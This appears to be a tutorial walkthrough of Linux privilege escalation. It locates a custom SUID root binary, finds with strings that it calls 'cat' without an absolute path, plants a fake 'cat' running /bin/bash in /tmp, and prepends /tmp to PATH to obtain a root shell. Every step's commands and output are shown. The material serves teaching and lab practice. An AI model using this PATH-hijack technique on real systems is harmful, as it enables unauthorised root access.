$PATH Variable
PATH is an environment variable in Linux that tells the shell which directories to search for executable files. Whenever a user types a command that is not built into the shell and does not include an absolute path, the shell searches through those directories, which constitute the user's search path ($PATH), until it finds an executable file with that name.
You can view the current user's search path by issuing the command: echo $PATH
    sam@debian:~$ echo $PATH
    /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    sam@debian:~$
As you can see, when you execute a command on the command line, the shell searches through the directories in your $PATH variable, in order, for the command to run. For example, if we type the 'cat' command, the shell searches '/usr/local/sbin', '/usr/local/bin', and so on until it finds the 'cat' executable and runs it.
SUID Programs
SUID programs execute in the context of the owner of the file. We would prefer the owner to be root, so that everything executed by the program is also executed as root.
Next we search for any SUID files on the system that we may exploit.
    sam@debian:~$ find / -perm -u=s -type f 2>/dev/null
    /home/sam/myprog
    /usr/sbin/pppd
    /usr/bin/gpasswd
    /usr/bin/sudo
    /usr/bin/bwrap
    /usr/bin/newgrp
    /usr/bin/passwd
    /usr/bin/su
    /usr/bin/chfn
    /usr/bin/ntfs-3g
    /usr/bin/mount
    /usr/bin/fusermount
    /usr/bin/pkexec
    /usr/bin/chsh
    /usr/bin/umount
    /usr/lib/openssh/ssh-keysign
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/xorg/Xorg.wrap
    sam@debian:~$
The search lists a program, '/home/sam/myprog', that is not a standard system binary. We next view the file permissions of the file.
    sam@debian:~$ ls -l
    total 68
    drwxr-xr-x 2 sam  sam   4096 Nov 10 11:14 Desktop
    drwxr-xr-x 2 sam  sam   4096 Nov 10 11:14 Documents
    drwxr-xr-x 2 sam  sam   4096 Nov 10 11:14 Downloads
    drwxr-xr-x 2 sam  sam   4096 Nov 10 11:14 Music
    -rwsr-xr-x 1 root root 16712 Jan 11 23:24 myprog
    drwxr-xr-x 2 sam  sam   4096 Nov 10 11:14 Pictures
    drwxr-xr-x 2 sam  sam   4096 Nov 10 11:14 Public
    drwxr-xr-x 3 sam  sam   4096 Jan 11 23:41 public_html
    drwxr-xr-x 2 sam  sam   4096 Nov 10 11:14 Templates
    drwxr-xr-x 2 sam  sam   4096 Nov 10 11:14 Videos
    sam@debian:~$
The permissions '-rwsr-xr-x' show that the SUID bit is set, and the owner is 'root'. Let's analyze the file with the 'strings' program and see if we find anything interesting.
    sam@debian:~$ strings myprog | less
    /lib64/ld-linux-x86-64.so.2
    $=v/
    libc.so.6
    setuid
    system
    __cxa_finalize
    setgid
    __libc_start_main
    GLIBC_2.2.5
    _ITM_deregisterTMCloneTable
    __gmon_start__
    _ITM_registerTMCloneTable
    u/UH
    []A\A]A^A_
    cat /home/sam/backup/a.tmp
    ;*3$"
    GCC: (Debian 8.3.0-6) 8.3.0
    :q
    sam@debian:~$
Analyzing the results from 'strings', we find the program running the command 'cat /home/sam/backup/a.tmp'. Because 'cat' is called without an absolute path, it is looked up through $PATH. What we want to do is create our own cat binary and export our PATH so that it includes the directory where our malicious binary is stored.
We first create our binary in the '/tmp' directory of the system.
    sam@debian:~$ cd /tmp
    sam@debian:/tmp$ echo "/bin/bash" > cat
    sam@debian:/tmp$ chmod 777 cat
    sam@debian:/tmp$
Once we have done that we echo our PATH variable to show us what search paths the shell uses when executing commands.
    sam@debian:/tmp$ echo $PATH
    /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    sam@debian:/tmp$
Now we want to export our PATH so that it points to '/tmp' and searches that directory first when a command is executed.
    sam@debian:/tmp$ export PATH=/tmp:$PATH
    sam@debian:/tmp$ echo $PATH
    /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
We echo the PATH again and see that '/tmp' is now first in the list of directories to search. This means that when the program 'cat' is executed, the shell will search '/tmp' before all other directories and will execute our malicious 'cat' binary and give us a root shell.
    sam@debian:/tmp$ cd /home/sam
    sam@debian:~$ ./myprog
    root@debian:~# id
    uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),114(scanner),117(lpadmin),1000(sam)
    root@debian:~# whoami
    root
    root@debian:~#
Once we execute the 'myprog' program we get dumped into a root shell.